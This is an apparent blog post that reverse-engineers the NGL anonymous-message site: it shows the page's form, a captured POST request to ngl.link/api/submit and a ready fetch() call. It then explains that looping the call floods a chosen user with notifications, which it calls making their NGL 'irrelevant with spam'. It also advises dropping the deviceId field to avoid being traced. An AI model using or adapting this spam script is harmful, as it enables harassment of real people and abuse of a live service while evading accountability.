Why use NGL?
Introduction #
NGL is an application (and a website) which is intended to work with instagram
(to post stories/posts). It lets the authors receive anonymous messages from the people
with fancy designs and colors. NGL actually stands for Not Gonna Lie.
To use NGL, one must download their application from the Play store and choose a username and a category. The application then generates a link similar to:
https://ngl.link/<username>
I am actually offended on the content or the ideas NGL or its users have. Having anonymity is great, appreciate it. But because of anonymity we now have a lot of problems. There can be random people posting something negative about you and you can’t do anything unless the NGL author checks it out. It has happened to my friends a lot. I decided to find a solution for this problem.
Inner workings #
But, little do the users know, the link (mentioned above) actually points to a webpage with a form like:
<form class="form" method="post">
<div class="bubble">
<div class="header">
<div class="pfp-container"></div>
<div class="user-container">
<div class="username">@xxx</div>
<div class="prompt">send me anonymous messages!</div>
</div>
</div>
<div class="textarea-container">
<div class="dice-button">🎲</div>
<textarea placeholder="send me anonymous messages..." name="question"
autocomplete="off" maxlength="300" id="question"
style="width: 572px; height: 155px;" 0></textarea>
</div>
<input class="deviceId" type="hidden" name="deviceId"
id="deviceId" value="b34cd4a3-607e-48bd-9d54-591c34a61b4b">
</div>
<div class="anonymous-tooltip">🔒 anonymous q&a</div>
<button class="submit" type="submit"
style="transform: translateZ(0px); z-index: 1000; display: none;">Send!</button>
</form>
From the form or if we observed the network tab in inspect, we will find that the page makes a request (similar to the below) to its backend
POST /api/submit HTTP/2
Host: ngl.link
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 94
Origin: https://ngl.link
DNT: 1
Connection: keep-alive
Referer: https://ngl.link/<username>
Cookie: __stripe_mid=<UUID1>; __stripe_sid=<UUID2>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
username=<username>&question=<question>&deviceId=<UUID>&gameSlug=&referrer=
Remember, the developers at NGL offer a paid subscription to know which users have posted a message. From the
post parameters, we can say that the deviceId parameter may be used for tracking the users apart from the IP address.
If we gave it a good thought, we would quickly identify that there was no authentication involved to send a message. Most websites employ a captcha to do the job. But, NGL, NO!
Using the facts #
Now, it is a matter of time that we write a python script to automate this job. We can use the inspect tab to convert the request as node fetch and the script would look like this:
await fetch("https://ngl.link/api/submit", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla U/A",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin"
},
"referrer": "https://ngl.link/<username>",
"body": "username=<username>&question=<question>&deviceId=<uid>&gameSlug=&referrer=",
"method": "POST",
"mode": "cors"
});
We should consider omitting the deviceId parameter because it can be used to trace you. Now, wrapping the above code in a while loop would actually burst the author’s phone with a lot of notifications. But, there is a caveat. The API has a rate limiter (40-60 requests/second). But if we ran this for a long time, we can make the author’s NGL irrelevant with spam.